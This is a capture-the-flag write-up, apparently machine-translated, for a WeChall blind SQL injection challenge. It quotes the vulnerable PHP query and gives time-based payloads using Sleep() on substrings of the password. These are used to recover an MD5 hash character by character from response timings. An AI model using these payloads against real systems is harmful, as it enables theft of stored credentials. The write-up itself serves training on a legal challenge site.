Writeup blinded by the lighter

Topic Tip:

1. Again your mission is to extract a MD5 password hash out of the database.

You need to get the password information in the database, and the password is MD5 encrypted.

2. This time your limit for this blind SQL injection is queries.

Can be injected up to 33 times.

3. Also you has to accomplish this task 3 times consecutively and to prove you have solved the challenge.

Even do three times to calculate success, why ... Why... Why...

4. You can view some key source code, the injection point is actually this sentence:

$query = "Select 1 from (select password from blight where sessid= $sessid) b where password= ' $password '";

There's still time limit:

/** * Check If you were too slow. * @return True|false */function blighttimeout () {if (false = = = ($start = Gwf_session::getordefault (' Blight2_tim         E_start ', false)) {return true;         } else{return (Time ()-$start) > Blight2_time; }}

Actually do so, the time a little longer on the hint said too slow, had to re ...

Solving:

Look at other people's writeup mentioned can be through the sleep function and then according to response time to judge

' Or Sleep (ord (substr (password,1,1)))

After testing the ASCII code to determine the impact time is too long, because the character is limited to 0-9,a-f between the above judgment sentence to the following, after the discovery of time or not enough to be used in addition to a 2, as to why the reduction is 46 of you think it, haha, personal feeling 46 the most suitable:

' Or Sleep ((Ord (substr (password,1,1))-46)/2) #

OK, injection success, then how to judge the time delay, then need to pass the Firebug plug-in Firefox, F12 open furebug, select the Network tab, select HTML and keep two options, choose to keep the history of the record after the unified view, This will increase the speed, and the purge option is to clear the history.

OK, here we go:

1. Reset the topic execute a Reset

2. Clear Firebug History

3. Start injection from the first character until the 32nd one

4. Look at the response time after each injection in Firebug, notice to move the mouse over the timeline to see the last time to accept the data on the small pop-up window, how to choose the time scale? In 0.5 units, more than part of the house, such as 0.76 is considered to be 0.5

5. Prepare Excel tables in advance, calculate char (x*2+46), and X as response time

6. OK, tidy up the data to submit it, is not prompted to succeed, and then repeat the two steps of the problem is done.

This article is from the "H2wechall" blog, make sure to keep this source http://1176518111.blog.51cto.com/9678787/1693484

Writeup blinded by the lighter